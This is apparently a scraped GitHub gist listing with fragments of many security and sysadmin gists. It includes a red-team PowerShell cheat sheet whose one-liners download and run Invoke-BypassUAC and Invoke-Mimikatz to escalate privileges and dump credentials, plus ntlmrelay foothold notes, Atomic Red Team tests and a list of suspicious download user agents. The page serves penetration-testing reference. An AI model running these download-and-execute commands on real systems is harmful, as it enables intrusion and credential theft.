:electron:
maybe!

EK_ jivoi
@jivoi
jivoi / pwn-o-magic.md
Created Jul 16, 2019 — forked from braimee/pwn-o-magic.md
Pwning internal networks automagically
View pwn-o-magic.md

Intro

This document pools several awesome tools and blog entries together (see "Resources" at the end of this doc) in an attempt to automate the process of getting an initial foothold on a network in a situation where you have no valid credentials.

Download and install ntlmrelay

Ok, so one weird thing I'm trying to figure out is if I install ntlmrelay as the first tool we'll use, these steps seem to work ok:

git clone https://github.com/CoreSecurity/impacket.git /opt/impacket
cd /opt/impacket
pip install .
View Native-Windows-Useragents-malicious.txt
//Invoke-WebRequest in Powershell - manually whitelist legit content first:
Mozilla/*WindowsPowerShell/*
System.Net.WebClient.DownloadFile():
None
//Start-BitsTransfer - manually whitelist legit content first:
Microsoft BITS/*
//certutil.exe - manually whitelist legit content first:
@jivoi
jivoi / AtomicTestsCommandLines.txt
Created Sep 5, 2018 — forked from caseysmithrc/AtomicTestsCommandLines.txt
Atomic Tests - All Command Lines - Replace Input Arguments #{input_argument} - More Soon
View AtomicTestsCommandLines.txt
[ASCII art banner: ATOMIC RED TEAM]
[********BEGIN TEST*******] Data Compressed T1002 has 3 Test(s)
View RedTeam_CheatSheet.ps1
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
View update curl from source
sudo apt-get install checkinstall build-essential automake autoconf libtool pkg-config libcurl4-openssl-dev intltool libxml2-dev libgtk2.0-dev libnotify-dev libglib2.0-dev libevent-dev
wget https://curl.haxx.se/download/curl-7.60.0.tar.gz
tar xzf curl-7.60.0.tar.gz
# change into the extracted source tree before building
cd curl-7.60.0
./buildconf
./configure
checkinstall
dpkg -i /root/curl/curl-7.60.0/curl_7.60.0-1_amd64.deb
View ubuntu_18.04_mini_i3.md

Minimal i3 Ubuntu 18.04

TL;DR

A fully functional and good-looking Linux for less than 256 MB of RAM

Setting Up

Downloading and installing

Get the "mini.iso" image from archive.ubuntu.com

Legacy boot

Just flash a USB drive with it as follows.

sudo dd bs=4M if=mini.iso of=/dev/sd<?> conv=fdatasync && sync
View gist:92b393ef168a8f5434bd7f4b527ab2b6
sudo apt-get install checkinstall build-essential automake autoconf libtool pkg-config libcurl4-openssl-dev intltool libxml2-dev libgtk2.0-dev libnotify-dev libglib2.0-dev libevent-dev
wget https://www.inet.no/dante/files/dante-1.4.2.tar.gz
# extract and change into the source tree before configuring
tar xzf dante-1.4.2.tar.gz
cd dante-1.4.2
./configure
make
sudo checkinstall
sudo dpkg -i dante_1.4.2-1_amd64.deb
# /etc/sockd.conf
# logoutput: syslog
@jivoi
jivoi / PowerView-2.0-tricks.ps1
Created Mar 10, 2018 — forked from HarmJ0y/PowerView-2.0-tricks.ps1
PowerView-2.0 tips and tricks
View PowerView-2.0-tricks.ps1
# NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/)
# has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>
# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GroupName <GROUP> -Recurse
# get the effective set of users who can administer a server
View burpsettings.json
{
"project_options":{
"connections":{
"hostname_resolution":[],
"out_of_scope_requests":{
"drop_all_out_of_scope":false,
"exclude":[
{
"enabled":true,
"file":"logout",
@jivoi
jivoi / autoburp.sh
Created Mar 9, 2018 — forked from jgamblin/autoburp.sh
Automatic Burp Script With Slack Reporting.
View autoburp.sh
#!/bin/sh
java -jar -Xmx2g -Djava.awt.headless=true ~/BurpSuitePro/burpsuite_pro.jar http jerrygamblin.com 80
cp *.html ~/BurpSuitePro/scan.html
wkhtmltopdf scan.html scan.pdf
curl -F file=@scan.pdf -F initial_comment="BurpProxy JerryGamblin.com Scan" -F channels=#burpreports -F token=(Your Token) https://slack.com/api/files.upload
rm *.html
rm *.pdf